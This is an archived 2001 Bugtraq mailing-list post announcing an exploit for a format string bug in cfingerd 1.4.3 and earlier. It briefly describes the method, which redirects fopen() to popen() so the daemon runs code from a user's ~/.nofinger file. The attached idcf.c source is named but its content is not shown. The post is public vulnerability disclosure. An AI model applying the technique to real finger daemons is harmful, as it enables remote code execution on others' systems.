[21466] in bugtraq


Happy 3 month anniversary cfingerd remote bug!

daemon@ATHENA.MIT.EDU (zen-parse@gmx.net)
Wed Jul 11 20:02:49 2001

Date: Thu, 12 Jul 2001 04:51:24 +1200 (NZST)
From: <zen-parse@gmx.net>
To: <bugtraq@securityfocus.com>
Message-ID: <Pine.LNX.4.33.0107120434070.10330-200000@clarity.local>
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="-1463783680-1062882213-994870284=:10330"

---1463783680-1062882213-994870284=:10330
Content-Type: TEXT/PLAIN; charset=US-ASCII

Remotish / localish  exploit.

I wrote this last night, unaware someone else was going to post something
today.

Here is another exploit for the format string problem in cfingerd<=1.4.3,
using a slightly different method for exploiting it. Anti script-kiddied
by me being lazy.

Exploit redirects fopen() call to popen() and executes code from
~/.nofinger

Read the comments.

 -- zen-parse


                   M4D PR0PZ T0 :

           Steven for showing me da bugz
        noid 4 b3in6 7h3r3 wh3n no1 3153 w4z
        grue 4 lurking,  g00bER 4 something
     and the rest of #roothat @ irc.pulltheplug.com

       4150 70 mp3.com 4 http://mp3.com/cosv


---1463783680-1062882213-994870284=:10330
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="idcf.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.33.0107120451230.10330@clarity.local>
Content-Description: 
Content-Disposition: attachment; filename="idcf.c"
---1463783680-1062882213-994870284=:10330--
